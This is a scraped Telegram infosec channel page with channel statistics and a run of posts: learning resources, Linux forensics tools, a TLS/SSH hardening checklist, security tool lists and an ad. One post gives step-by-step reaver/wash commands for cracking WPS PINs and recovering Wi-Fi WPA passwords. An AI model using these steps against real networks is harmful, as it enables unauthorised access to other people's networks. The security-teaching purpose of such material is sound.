CodeGuard: PySec Edition
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Show more📈 Analytical overview of Telegram channel CodeGuard: PySec Edition
Channel CodeGuard: PySec Edition is an active participant. Currently, the community unites 14 089 subscribers, ranking 8 760 in the Technologies & Applications category and 45 869 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 14 089 subscribers.
According to the latest data from 26 September, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 821 over the last 30 days and by 0 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 9.98%. Within the first 24 hours after publication, content typically collects 5.58% reactions from the total number of subscribers.
- Post reach: On average, each post receives 1 407 views. Within the first day, a publication typically gains 786 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 8.
- Thematic interests: Content is focused on key topics such as codeguard, pysec, docker, grep, контейнер.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Thanks to the high frequency of updates (latest data received on 27 September, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
«~» Шедевро-репозиторий представляет собой живую подборку из нескольких сотен бесплатных комнат TryHackMe, разложенных по удобным разделам с разными уровнями и темами📌 Какие разделы есть внутри:
🎥 Fundamentals: вводные комнаты, Linux/Windows‑база, принципы безопасности, первые пентест‑сценарии 🎥 Тематические ветки: Recon, Scripting, Web, Forensics, Malware Analysis, PrivEsc, Active Directory, PCAP, Buffer Overflow 🎥 CTF‑блоки: CTF всех уровней + спец‑ивенты вроде Advent of Cyber, чтобы качать навык решения задач под разным уровнем боли в пятой точке🤩 Репозиторий удобно использовать как чек‑лист для обучения кибербезу — отметили, что уже прошли, выбрали следующую тему, закрепили практикой на TryHackMe без бесконечного скролла каталога комнат. Все просто 😏 😈 CodeGuard: PySec Edition | Чат
1️⃣ Linux Command Line Forensics and Intrusion Detection — Набор базовых команд для быстрого осмотра живой Linux‑системы: процессы, сетевые соединения, пользователи, cron, бинарники, логи 2️⃣ Linux Forensics Cheatsheet — Краткие сводки по основным артефактам: auth‑логи, системные журналы, history, bashrc, SSH‑ключи, cron, временные файлы 3️⃣ Linux Forensic Artifact Cheatsheet — Шпаргалка с фокусом на артефакты и инструменты: LiME и AVML для дампа памяти, Volatility и Rekall для анализа, Sleuth Kit и Autopsy для дисков, Plaso и log2timeline для таймлайнов👁️ Инструменты и дистрибутивы:
4️⃣ LiME и AVML — LiME и AVML позволяют аккуратно снять дамп RAM с Linux‑системы, чтобы потом разбирать его 5️⃣ Volatility и Rekall — Фреймворки для работы с дампами: процессы, модули ядра, скрытые процессы, сетевые сессии, артефакты малвари 6️⃣ The Sleuth Kit — Набор утилит и GUI‑оболочка для анализа образов дисков: файловые системы, удалённые файлы, метаданные, временные метки, артефакты браузера и пользователя 7️⃣ Plaso — Инструмент, который собирает события из логов, файловой системы и артефактов в единый временной ряд🤡 Живой IR и автоматизация
8️⃣ Linux live forensics — Практические разборы инцидентов на живых Linux‑серверах: какие данные собирать в первые минуты, чем это грозит для целостности артефактов и как автоматизировать сбор 9️⃣ LINReS — Open source‑скрипт под live‑IR: собирает volatile и non‑volatile данные с подозрительного хоста и отправляет их на форензик‑станцию по заранее поднятым каналамНабираем 15 реакций и я дропаю минимальный чек‑лист по теме «Что сделать в первые 10–15 минут на скомпрометированном Linux‑хосте» с конкретными командами 🔑 😈 CodeGuard: PySec Edition | Чат
— Базовый и продвинутый data science: Python, анализ данных, визуализация, машинное обучение, работа с реальными датасетами — ИИ и ML: вводные по AI, классические алгоритмы, нейросети, NLP, компьютерное зрение — Облака и big data: основы cloud‑вычислений, работа с Hadoop и Spark, построение решений в облаке📎 Отдельный плюс: За прохождение многих треков можно получить сертификаты и бейджи, которые удобно прикладывать к резюме и профилю 😈 CodeGuard: PySec Edition | Чат
«~» WPS — это удобная настройка Wi‑Fi по кнопке или пину, которая сильно упрощает жизнь пользователю, но делает сеть уязвимой для перебора. В статье по ссылке говорится как правильно провести этот самый перебор. Делюсь своим опытом, как я организовывал подобную атаку по данному материалу🤩 Шаг 1. Готовим карту и систему: Нам понадобится карта с режимом монитора и инъекциями (Atheros часто ведёт себя лучше всего с Reaver) — Отключаем всё лишнее:
sudo systemctl stop NetworkManager
sudo airmon-ng check kill
— Смотрим интерфейс:
sudo iw dev
— Переводим wlan0 в монитор‑режим:
sudo ip link set wlan0 down
sudo iw wlan0 set monitor control
sudo ip link set wlan0 up
🔍 Шаг 2. Ищем точки с включённым WPS: Для разведки возьмем wash (идёт в комплекте с Reaver)
sudo wash -i wlan0
— Ждем пару минут и смотрим колонки:
🎥 BSSID – MAC точки
🎥 Ch – канал
🎥 WPS – версия WPS
🎥 Lck – блокировка WPS (No — интересует, Yes — можно пройти мимо)
🎥 ESSID – имя сети
(Для атаки подойдут только те, у кого Lck = No)
💀 Шаг 3. Проверим Pixie Dust через Reaver: Если точка уязвима к Pixie Dust, PIN можно вытащить почти сразу, без долгого онлайнового перебора
— Берем BSSID из вывода wash, например:
EE:43:F6:CF:C3:08
— Запускаем проверку:
sudo reaver -i wlan0 -b EE:43:F6:CF:C3:08 -K
— Если роутер уязвим, Reaver покажет PIN вида:
WPS pin: 36158805
(На этом этапе у нас есть PIN, но все ещё нет WPA‑пароля)
👾 Шаг 4. Полный перебор WPS PIN, если Pixie не зашёл: Если Pixie Dust не сработал и PIN’ы не подошли, остаётся классический перебор:
sudo reaver -i wlan0 -b EE:43:F6:CF:C3:08 -vv
— Ключи -v/-vv/-vvv увеличивают подробность вывода и помогают понять, на чём всё ломается
>> За счёт уязвимости протокола WPS реальное пространство перебора — всего около 11 000 комбинаций, а не десятки миллионов, поэтому это задача на пару часов для опытных спецов
🤲 Шаг 5. Если у нас уже есть PIN, то достаем WPA‑пароль: Если PIN уже известен, можно попросить Reaver вытащить WPA‑пароль напрямую:
sudo reaver -i wlan0 -b EE:43:F6:CF:C3:08 -p 36158805 -vv
— В успешном сценарии на выходе получаю строку с PSK: это и есть пароль от Wi‑Fi
🛡 Как наоборот защититься от атак?
>> С точки зрения защиты единственный надёжный шаг, это отключить WPS с PIN в настройках роутера. Если производитель позволяет, плюсом включить блокировку WPS
😈 CodeGuard: PySec Edition | Чат— Как выстраивать процесс реагирования от обнаружения атаки и разбора логов до ликвидации и пост‑анализа — Как работать с киберрисками: выявлять активы и уязвимости, оценивать влияние инцидента на бизнес, выбирать, какие риски можно реально снижать, а какие наоборот осознанно принимать — Как использовать open source‑инструменты и простые практики, когда SIEM за миллионы не завезли, а инциденты уже есть💡 Также приятно то, что упор сделан на реальные кейсы и разбор типовых факапов: ошибки в коммуникации, неправильную приоритизацию, отсутствие плана IRP и документации — все то, что в жизни ломается куда чаще, чем сами технологии. ➡️ Забрать курс 😈 CodeGuard: PySec Edition | Чат
Книга показывает, почему даже идеально настроенный периметр бессилен, если сотрудники сами выдают доступы, кликают по ссылкам и доверяют админам по телефону🌟 Что внутри книги? — Психология атак: какие триггеры используют социнженеры и как из них собираются сценарии фишинга — Практический OSINT и подготовка атак, как по открытым источникам собрать досье на компанию и людей — Этичный пентест людей: структуры фишинговых кампаний + рекомендации, как результаты таких тестов превращать в обучение 💡 Чем так хороша эта книга? >> Она является хорошим мостом между технарями и человеческим периметром. После прочтения книги проще объяснить бизнесу, почему защиты от людей нужны не меньше, чем новый firewall 📕 Ссылка на книгу как всегда в нашем архиве — [ARCHIVE] 😈 CodeGuard: PySec Edition | Чат
git add: нужен, чтобы перенести выбранные изменения в подготовительную область
2️⃣ Staging: Снимок того, что пойдёт в следующий коммит
—git commit: зафиксировать содержимое staging в локальном репозитории
3️⃣ Local Repository: История всех ваших коммитов на машине
—git push: отправить локальные коммиты на сервер
—git fetch: забрать новые коммиты с сервера без слияния
—git pull – fetch + авто‑слияние в текущую ветку
5️⃣ Stash: Когда нужно убрать со стола, но ещё рано коммитить
— git stash: спрятать незакоммиченные изменения
— git stash apply: вернуть изменения, не очищая stash
— git stash pop: вернуть и одновременно удалить запись из stash
5️⃣ Remote Repository
— Общий репо проекта на GitHub / GitLab / Bitbucket, куда пушит вся команда
😈 CodeGuard: PySec Edition | Чат«~» Теорию про знает каждый второй, а вот тех, кто реально открывал конфиг и бил по нему в разы меньше. Подготовил для вас практический чек-лист, который подойдет к любому серверу1️⃣ Проверяем TLS: что торчит наружу — Быстрый скан протоколов и шифров:
nmap --script ssl-enum-ciphers -p 443 example.com
В выводе смотрим:
🎥 Отключены ли SSLv2/3 и старые TLS 1.0/1.1
🎥 Нет ли древних шифров вроде 3DES/RC4
🎥 Используется ли современный TLS 1.2/1.3 с AES‑GCM или CHACHA20
2️⃣ Смотрим сертификат через openssl
echo QUIT | openssl s_client -connect example.com:443 2>/dev/null \
| openssl x509 -noout -issuer -dates -subject
— Проверяем кто выдал сертификат, не истёк ли он и корректен ли subject/сан‑имена. Полезно для быстрой диагностики и проверки сторонних сервисов без GUI
3️⃣ Жёстко настраиваем SSH, акцентируем внимание на ключи и современные шифры
— Резервная копия и правка конфига:
sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
sudo nano /etc/ssh/sshd_config
Базовый набор, который стоит включить почти везде:
Protocol 2
PasswordAuthentication no
PermitRootLogin no
ClientAliveInterval 300
ClientAliveCountMax 2
После изменений:
sudo systemctl restart sshd
— Так вы режете логин по паролю, прямой root и вешаете таймаут на вечные зависшие сессии
После такого цикла безопасность протоколов начинает ощущаться как осязаемый набор рычагов, за которые можно дёргать самому, пользуемся 😎
😈 CodeGuard: PySec Edition | Чат1) Raccoon — Высокопроизводительный сканер для рекогносцировки: с DNS, портами, веб‑фингерпринтингом, всё в одном CLI 2) BlueTeam-Tools — Собрание инструментов для blue team: мониторинг, лог‑анализ, форензика, DLP, сетевые сенсоры и т.п. 3) Awesome Annual Security Reports — Годовые отчёты по угрозам, инцидентам и трендам от разных компаний 4) OSSEC — Хостовый IDS с мониторингом логов, файловой системой, rootkit‑чекером, алертамм по правилам 5) SafeLine — Высокопроизводительный прокси с встроенным WAF: защита HTTP‑трафика, правила, дашборд, удобный деплой в Docker/K8s. 6) ZAP — Прокси‑сканер приложений: пассивный и активный поиск уязвимостей, фуззинг, API для автоматизации 7) Radare2 и Cutter — Radare 2 это CLI‑фреймворк для анализа бинарей и памяти. Вместе с GUI‑фронтендом Cutter покрывает большую часть задач реверса и отладки 8) Cuckoo Sandbox — Песочница для автоматического запуска подозрительных образцов, имеет настройку поведения, сетевого трафика, артефактов в системе 9) AutoRecon — Фреймворк, который запускает цепочку проверок и раскладывает результаты по папкам 10) pcileech — Инструменты для работы через PCIe/DMA (dump/patch RAM, обход аутентификации и т.п.)😈 CodeGuard: PySec Edition | Чат
«•» После просмотра этого видео Burp перестанет выглядеть как страшная панель с сотней кнопок и превратится в понятный рабочий инструмент 🗒 В уроке автор спокойно проходит весь путь работы с ним: — Разбор настройки прокси — Перехват и правка HTTP‑запросов — Наглядная работа с Repeater и Intruder — Обучение поиску уязвимостей на тестовом приложении ➕ Отдельный плюс — автор делает упор на реальные приёмы: где смотреть параметры, как быстро гонять payload’ы и на что обращать внимание при тестировании веб‑приложений 📎 Смотрим и закрепляем свои знания *здесь* 😈 CodeGuard: PySec Edition | Чат
—> Веб-движок умеет сам ходить по сайтам и другим открытым источникам, собирать новости и статьи, прогонять их через NLP и вытаскивать из текста сущности и ключевые факты🔇 Что делает Taranis AI: 1) Агрегирует сырые OSINT‑события в единую ленту 2) Нормализует и обогащает контент через NER, дедупликацию, выделение важных сигналов 3) Поддерживает совместную работу команд и обмен историями через MISP 🔑 Taranis AI отлично подходит как ядро OSINT‑процесса для blue‑team: он берёт на себя рутину сбора и первичной обработки, а аналитик тратит время только на интерпретацию и принятие решений 😈 CodeGuard: PySec Edition | Чат
Loading … ██████████████] 99%Роскомнадзору дали карт-бланш на блокировки, а «белые списки» сайтов тестируют уже в десятках регионов. И гайки будут закручиваться только сильнее. Чтобы в одночасье не лишиться доступа к свободному Интернету, просто сохрани Only Hack. Тут профессиональный хакер делится фишками, с которыми доступ к глобальной сети у тебя будет даже в случае ядерного апокалипсиса. Не жди момента «Х». Перестрахуйся подпиской.
«~» Обычно Nmap сам ломится к целям в дверь, smap же делает все аккуратнее. Он берёт уже готовые данные у Shodan и собирает по ним картину открытых портов и сервисов, без всяких SYN‑флудов🔑 ЧТО ОН УМЕЕТ? 1. Drop‑in замена Nmap — Принимает те же ключи -p, -o*, -iL, -h и выдаёт выход в привычных форматах (-oX, -oG, -oN, -oA) 2. До 200 хостов/сек без сканирования сети — По факту мы лишь дергаем бесплатный Shodan API, а Smap отвечает скоростью и не светит ваш IP 3. Версии сервисов и уязвимости — Smap подтягивает баннеры, версии и связанные CVE/теги. В формате -oS можно увидеть уязвимости и метки Shodan 🥸 Помимо nmap‑форматов у него есть и свои:
-oP — список IP:PORT построчно для пайплайнов и других тулов -oJ — JSON -oS — фирменный Smap‑формат с тегами и уязвимостями⭐️ Ставим Smap себе здесь 😈 CodeGuard: PySec Edition | Чат
